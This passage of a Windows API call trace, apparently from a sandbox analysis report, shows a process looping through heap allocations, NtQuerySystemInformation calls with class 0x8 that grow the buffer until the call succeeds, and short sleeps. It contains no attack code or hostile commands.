[0232.080] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.080] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.080] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0232.080] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.081] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.081] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0232.081] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0232.082] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.082] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0232.082] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.082] Sleep (dwMilliseconds=0x110) [0232.095] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0232.095] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.096] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.096] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0232.096] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.096] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.096] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0232.096] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.097] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.097] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0232.097] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0232.098] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.098] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0232.098] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.098] Sleep (dwMilliseconds=0x110) [0232.112] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0232.112] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.113] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.113] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0232.113] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.114] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.114] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0232.114] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.114] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.114] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0232.114] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0232.115] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.115] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0232.115] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.115] Sleep (dwMilliseconds=0x110) [0232.139] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0232.139] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.139] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.139] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0232.139] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.140] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.140] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0232.140] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.140] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.140] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0232.140] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0232.141] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.141] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0232.141] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.141] Sleep (dwMilliseconds=0x110) [0232.155] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0232.155] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.157] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.157] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0232.157] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.157] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.157] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0232.157] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.158] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.158] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0232.158] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0232.158] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.158] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0232.159] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.159] Sleep (dwMilliseconds=0x110) [0232.170] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0232.170] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.170] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.170] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0232.170] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.171] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.171] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0232.171] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.171] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.171] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0232.171] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0232.172] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.172] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0232.173] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.173] Sleep (dwMilliseconds=0x110) [0232.186] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0232.186] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.186] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.186] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0232.186] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.187] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.187] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0232.187] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.187] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.187] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0232.188] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0232.188] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.188] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0232.189] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.194] Sleep (dwMilliseconds=0x110) [0232.202] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0232.202] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.202] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.202] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0232.202] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.203] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.203] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0232.203] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.204] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.204] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0232.204] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0232.205] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.205] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0232.205] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.205] Sleep (dwMilliseconds=0x110) [0232.216] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0232.216] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.217] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.217] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0232.217] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.217] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.217] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0232.217] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.218] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.218] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0232.218] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0232.218] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.218] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0232.219] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.219] Sleep (dwMilliseconds=0x110) [0232.232] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0232.232] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.233] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.236] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0232.236] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.236] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.236] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0232.236] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.237] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.237] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0232.237] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0232.238] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.238] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0232.238] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.238] Sleep (dwMilliseconds=0x110) [0232.253] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0232.253] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.254] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.254] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0232.254] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.254] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.255] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0232.255] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.255] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.255] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0232.255] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0232.256] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.256] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0232.257] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.257] Sleep (dwMilliseconds=0x110) [0232.263] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0232.263] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.264] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.264] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0232.264] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.264] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.264] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0232.264] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.265] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.265] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0232.265] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0232.265] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.265] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0232.266] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.266] Sleep (dwMilliseconds=0x110) [0232.279] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0232.279] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.280] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.280] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0232.280] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.280] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.280] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0232.280] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.281] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.288] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0232.288] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0232.289] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.289] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0232.290] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.290] Sleep (dwMilliseconds=0x110) [0232.298] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0232.298] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.299] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.299] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0232.299] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.300] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.300] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0232.300] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.301] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.301] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0232.301] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0232.302] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.302] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0232.303] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.303] Sleep (dwMilliseconds=0x110) [0232.313] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0232.313] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, 